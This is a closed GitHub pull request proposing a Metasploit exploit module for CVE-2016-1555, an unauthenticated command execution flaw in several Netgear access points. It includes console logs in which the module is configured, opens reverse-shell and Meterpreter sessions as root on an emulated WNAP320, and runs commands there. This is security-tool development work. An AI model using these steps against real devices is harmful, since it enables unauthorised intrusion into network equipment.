New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add module and new wordlist for it for the CVE-2016-1555 vulnerability #10766

Closed
wants to merge 3 commits into
base: master
from

Conversation

Projects
None yet
2 participants
@Psi0NYX

Psi0NYX commented Oct 8, 2018

Add a new module for the CVE-2016-1555 vulnerability that targets the following Netgear devices with these firmwares:

  • WN604 before 3.3.3
  • WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, and WNDAP660 before 3.5.5.0

The corresponding wordlist file (netgear_boardData_paths.txt) contains all the URIs that might be vulnerable in the target versions. For the first vulnerable URI it finds, it "checks" for unauthenticated arbitrary command execution in the POST request.

Tested on: Netgear WNAP320 firmware 2.0.3, emulated with QEMU, setup by FIRMADYNE.

Verification

  • use exploit/linux/http/netgear_unauth_exec, then set the RHOST, LHOST and SRVHOST options. Default payload is linux/mipsbe/shell_reverse_tcp.
    pull1

  • Meterpreter for MIPSBE works fine too:
    pull2

  • No vulnerable URI means that it automatically fails, for both exploit and check:
    pull3

  • Basic documentation can be found at the documentation/modules/exploit/linux/http/netgear_unauth_exec.md file

Example Output with default payload (linux/mipsbe/shell_reverse_tcp)

msf > use exploit/linux/http/netgear_unauth_exec 
msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.0.100
RHOST => 192.168.0.100
msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.0.99
SRVHOST => 192.168.0.99
msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.0.99
LHOST => 192.168.0.99
msf exploit(linux/http/netgear_unauth_exec) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(linux/http/netgear_unauth_exec) > 
[*] Started reverse TCP handler on 192.168.0.99:4444 
[+] Got 200 OK for boardDataNA.php
[*] Starting the web service on http://192.168.0.99:8080/IXjlVHwcHNUELM ...
[*] Using URL: http://192.168.0.99:8080/IXjlVHwcHNUELM
[*] Sending the payload to the server...
[*] Command shell session 1 opened (192.168.0.99:4444 -> 192.168.0.100:44785) at 2018-10-08 11:31:45 +0630
[+] Deleted /tmp/IXjlVHwcHNUELM

msf exploit(linux/http/netgear_unauth_exec) > sessions -i 1
[*] Starting interaction with 1...

uname -a
Linux netgear123456 2.6.32.70 #1 Thu Feb 18 01:39:21 UTC 2016 mips unknown
whoami
root

Example Output with meterpreter

msf > use exploit/linux/http/netgear_unauth_exec 
msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.0.100
RHOST => 192.168.0.100
msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.0.99
SRVHOST => 192.168.0.99
msf exploit(linux/http/netgear_unauth_exec) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp
PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp
msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.0.99
LHOST => 192.168.0.99
msf exploit(linux/http/netgear_unauth_exec) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(linux/http/netgear_unauth_exec) > 
[*] Started reverse TCP handler on 192.168.0.99:4444 
[+] Got 200 OK for boardDataNA.php
[*] Starting the web service on http://192.168.0.99:8080/UcyqnUAGQ ...
[*] Using URL: http://192.168.0.99:8080/UcyqnUAGQ
[*] Sending the payload to the server...
[*] Sending stage (1108408 bytes) to 192.168.0.100
[*] Meterpreter session 1 opened (192.168.0.99:4444 -> 192.168.0.100:44787) at 2018-10-08 11:34:02 +0630
[+] Deleted /tmp/UcyqnUAGQ

msf exploit(linux/http/netgear_unauth_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer     : 192.168.0.100
OS           :  (Linux 2.6.32.70)
Architecture : mips
BuildTuple   : mips-linux-muslsf
Meterpreter  : mipsbe/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >

TODO LIST

  • Actually check for firmware version and vulnerability existence before launching the exploit. Other firmwares from Netgear may also have the same URIs, but might not be vulnerable. The check I used in this module right now is super quick and dirty, not very good at all. (Maybe using the command execution to return some form of verification back to the attacker? Could SNMP work?).
  • Stop the HTTP server after serving the payload! I think it doesn't stop properly after serving a payload or when a session is created.
  • When check is run explicitly, check for vulnerability in all the found URIs, not just the first one that's found. There are at least 2 vulnerable URIs, and one of them is most likely always boardDataWW.php.
  • Test the module against the latest vulnerable firmware versions (WN604 firmware 3.3.3 and WNAP320 firmware 3.5.5.0)

Psi0NYX added some commits Oct 8, 2018

Added module for CVE-2016-1555 (netgear_unauth_exec)
and its corresponding wordlist file (netgear_boardData_paths.txt).
Added documentation for
modules/exploit/linux/http/netgear_unauth_exec.rb
@bcoles

This comment has been minimized.

Show comment
Hide comment
@bcoles

bcoles Oct 8, 2018

Contributor

Hi @Psi0NYX

Thanks for the contribution.

It is required that code in your fork be merged from a unique branch in your repository to master in Rapid7's. Please create a new branch in your fork of framework and resubmit this from that branch.

git checkout -b <BRANCH_NAME>
git push <your_fork_remote> <BRANCH_NAME>

This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed.

Closing based on the this requirement, please do resubmit from a unique branch.

Contributor

bcoles commented Oct 8, 2018

Hi @Psi0NYX

Thanks for the contribution.

It is required that code in your fork be merged from a unique branch in your repository to master in Rapid7's. Please create a new branch in your fork of framework and resubmit this from that branch.

git checkout -b <BRANCH_NAME>
git push <your_fork_remote> <BRANCH_NAME>

This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed.

Closing based on the this requirement, please do resubmit from a unique branch.

@bcoles bcoles closed this Oct 8, 2018

@Psi0NYX

This comment has been minimized.

Show comment
Hide comment
@Psi0NYX

Psi0NYX Oct 8, 2018

Defeated by Git sorcery. Created pull request #10768.

Psi0NYX commented Oct 8, 2018

Defeated by Git sorcery. Created pull request #10768.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment